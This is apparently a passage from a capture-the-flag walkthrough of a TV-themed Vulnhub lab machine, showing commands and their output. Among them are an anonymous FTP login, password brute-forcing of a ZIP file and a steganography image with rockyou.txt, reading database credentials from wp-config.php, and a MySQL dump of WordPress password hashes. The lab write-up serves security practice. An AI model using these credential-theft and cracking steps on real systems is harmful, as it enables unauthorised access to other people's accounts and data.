FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f}

Back to FTP

Distracted by all the findings, I had missed the obvious opportunity: the anonymous FTP login. Time to correct that mistake. In howard’s public directory I found a note and a password-protected ZIP file.

t0thkr1s@kali ~> ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:t0thkr1s): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
-rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 23:57 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 00:40 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 02:32 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 23:57 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 00:25 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 23:57 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 00:09 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 00:08 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 19:38 sheldon
226 Directory send OK.
ftp> cd howard
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 273 Mar 04 00:05 note.txt
-rw-r--r-- 1 ftp ftp 30762 Mar 06 02:29 super_secret_nasa_stuff_here.zip
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (273 bytes).
226 Transfer complete.
273 bytes received in 0.00 secs (868.4090 kB/s)
ftp> get super_secret_nasa_stuff_here.zip
local: super_secret_nasa_stuff_here.zip remote: super_secret_nasa_stuff_here.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for super_secret_nasa_stuff_here.zip (30762 bytes).
226 Transfer complete.
30762 bytes received in 0.00 secs (58.2082 MB/s)
ftp> exit
221 Goodbye.

So, I decided to crack it with fcrackzip and rockyou.txt. I quickly got the password and extracted the JPG file. It looked like a dead end, but the creator of the machine gave me confidence that I was heading in the right direction. I used stegcracker to brute-force the passphrase of the data hidden in the image and get howard's flag.

t0thkr1s@kali ~> fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip
PASSWORD FOUND!!!!: pw == astronaut
t0thkr1s@kali ~> unzip super_secret_nasa_stuff_here.zip
Archive: super_secret_nasa_stuff_here.zip
[super_secret_nasa_stuff_here.zip] marsroversketch.jpg password:
replace marsroversketch.jpg? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: marsroversketch.jpg
t0thkr1s@kali ~> stegcracker marsroversketch.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)
Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: iloveyoumom
Tried 51221 passwords
Your file has been written to: marsroversketch.jpg.out
iloveyoumom
t0thkr1s@kali ~> file marsroversketch.jpg.out
marsroversketch.jpg.out: ASCII text
t0thkr1s@kali ~> cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}
t0thkr1s@kali ~>

FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}

WordPress Database

At this point, only one flag was left. I went back to the WordPress site directory to read the database credentials from the wp-config.php file.

root@tbbt:/var/www/html/music/wordpress# cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );
/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );
/** MySQL database password */
define( 'DB_PASSWORD', 'footprintsonthemoon1337' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...

I logged in with the above credentials and started looking around in the database. The wp_users table was not particularly interesting. However, I found the flag in the wp_posts table; you can see it at the end of the output.

root@tbbt:~# mysql -u footprintsonthemoon -p
Enter password: footprintsonthemoon1337
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 65066
Server version: 5.7.25-0ubuntu0.16.04.2 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+---------------------+
| Database |
+---------------------+
| information_schema |
| footprintsonthemoon |
+---------------------+
2 rows in set (0.00 sec)
mysql> use footprintsonthemoon;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+--------------------------------+
| Tables_in_footprintsonthemoon |
+--------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_reflex_gallery |
| wp_reflex_gallery_images |
| wp_responsive_thumbnail_slider |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+--------------------------------+
15 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+---------------------+------------------------------------+---------------------+-----------------------------------+----------+---------------------+-----------------------------------------------+-------------+---------------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+---------------------+------------------------------------+---------------------+-----------------------------------+----------+---------------------+-----------------------------------------------+-------------+---------------------+
| 1 | footprintsonthemoon | $P$BFLeWWEe.4pVHfJB6s6P6.0c6nYctc/ | footprintsonthemoon | footprintsonthemoon@localhost.com | | 2020-03-04 13:20:41 | | 0 | footprintsonthemoon |
| 2 | kripke | $P$BDKbtgEvH7gYy.WN/yHpgXCuxDPxRz/ | kripke | kripke@kripke.com | | 2020-03-04 13:44:57 | 1583329498:$P$B/6Ncexoc9g3tJOggQJvo2/npr5WHw0 | 0 | kripke |
| 3 | stuart | $P$BpHBwNm3fHTK28WUvZThgDmIJkmZrY/ | stuart | stuart@stuart.com | | 2020-03-04 13:48:30 | 1583329711:$P$BJbz3KB.OSQUCk/cZjlGFNrXAxJe7B1 | 0 | stuart |
+----+---------------------+------------------------------------+---------------------+-----------------------------------+----------+---------------------+-----------------------------------------------+-------------+---------------------+
3 rows in set (0.00 sec)
mysql> select * from wp_posts;
....
<!-- wp:paragraph -->
<p>FLAG-raz{40d17a74e28a62eac2df19e206f0987c}</p>
<!-- /wp:paragraph --> | Secret notes | | inherit | closed | closed | | 30-revision-v1 | | | 2020-03-04 15:04:50 | 2020-03-04 15:04:50 | | 30 | http://192.168.1.105/music/wordpress/index.php/2020/03/04/30-revision-v1/ | 0 | revision | | 0 |
....
26 rows in set (0.00 sec)
mysql>

FLAG-raj{40d17a74e28a62eac2df19e206f0987c}

Before You Go

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interests find it! Feedback is always welcome! 🙏


Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.